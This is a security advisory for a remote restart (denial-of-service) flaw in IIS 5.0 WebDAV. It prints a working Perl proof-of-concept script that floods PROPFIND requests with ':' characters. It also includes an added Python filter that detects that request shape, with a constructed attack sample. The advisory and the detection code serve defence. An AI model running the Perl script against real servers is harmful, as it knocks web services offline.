
IIS 5.0 remote restart
Vulnerability

    IIS

Affected

    IIS 5.0

Description

    The following is based on Georgi Guninski security advisory #44.
    It is possible to remotely restart all IIS-related services using
    a specially crafted request.  If this request is repeated
    continuously, it seriously affects IIS performance.

    Basically, the problem is a very long but valid PROPFIND request
    containing lots of ":".

    Demonstration:

    #!/usr/bin/perl
    use IO::Socket;
    printf "Written by Georgi Guninski wait some time\n";
    $port = @ARGV[1];
    $host = @ARGV[0];
    
    sub vv()
    {
    $ll=$_[0];
    $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") ||
    return;
    $over=":" x $ll ; # the ":" is the most important
    $ch=pack("C",65); # just to check whether potential payload is possible - yes
    $tmp = $ch x 64;
    $over= $ch x 4 . $over . $tmp;
    $over1=":" x $ll; #not sure about this
    
    $xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over1".':">';
    $xml=$xml.'<a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
    $l=length($xml);
    $req="PROPFIND / HTTP/1\.1\nContent-type: text/xml\nHost: $host\nContent-length:
    $l\n\n$xml\n\n";
    syswrite($socket,$req,length($req));
    print ".";
    $socket->read($res,200);
    print $res;
    close $socket;
    }
    
    
    do vv(59060);
    #this is overflow, repeat several times - 49060 seems the smallest #, may need to change
    sleep(1);
    do vv(59060);

Solution

    Disabling WebDav extensions  may help though  we do not  recommend
    using IIS on the Internet.
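
    Where WebDAV has to stay enabled, a filter or log check in front of
    the server can flag the request shape described above.  The Python
    check below is an added example, not part of the Guninski advisory;
    the limits, function names and sample requests are assumptions
    constructed for illustration.

```python
import re

# Assumed limits, not taken from the advisory: ordinary PROPFIND bodies are a
# few hundred bytes, far below the tens of thousands of ":" the page describes.
MAX_BODY = 8192
MAX_COLON_RUN = 64
MAX_XML_NAME = 256
COLON_RUN = re.compile(rb":{%d,}" % (MAX_COLON_RUN + 1))
ELEMENT_NAME = re.compile(rb"</?([^\s<>/=]+)")
XMLNS_VALUE = re.compile(rb"""xmlns(?::[^\s=]*)?\s*=\s*(["'])(.*?)\1""", re.S)

def inspect_request(raw):
    """Return the reasons to reject a raw HTTP request; empty list means pass."""
    parts = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)  # CRLF or bare-LF framing
    head, body = parts[0], parts[1] if len(parts) > 1 else b""
    lines = head.splitlines()
    if not lines or not lines[0].upper().startswith(b"PROPFIND "):
        return []  # only WebDAV PROPFIND requests are inspected here
    declared = b"0"  # a PROPFIND without a body is legal
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"content-length":
            declared = value.strip()
    reasons = []
    if not declared.isdigit():
        reasons.append("malformed Content-Length")
    elif int(declared) > MAX_BODY:
        reasons.append("declared length over limit")
    if len(body) > MAX_BODY:
        reasons.append("body over limit")
    if COLON_RUN.search(body):
        reasons.append("long run of ':'")
    names = [m.group(1) for m in ELEMENT_NAME.finditer(body)]
    names += [m.group(2) for m in XMLNS_VALUE.finditer(body)]
    if any(len(n) > MAX_XML_NAME for n in names):
        reasons.append("oversized XML name or namespace URI")
    return reasons

def sample_request(body):
    # Hypothetical helper: wraps an XML body in a constructed PROPFIND request.
    return (b"PROPFIND / HTTP/1.1\r\nHost: iis.example.test\r\n"
            b"Content-Type: text/xml\r\nContent-Length: "
            + str(len(body)).encode() + b"\r\n\r\n" + body)

# Constructed samples: a normal displayname query and one padded with ":".
BENIGN = sample_request(b'<?xml version="1.0"?><a:propfind xmlns:a="DAV:">'
                        b'<a:prop><a:displayname/></a:prop></a:propfind>')
PADDED = sample_request(b'<?xml version="1.0"?><a:propfind xmlns:a="DAV:" '
                        b'xmlns:u="' + b":" * 2000 + b'"><a:prop/></a:propfind>')
```

    inspect_request(BENIGN) returns an empty list; inspect_request(PADDED)
    reports both the colon run and the oversized namespace URI.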
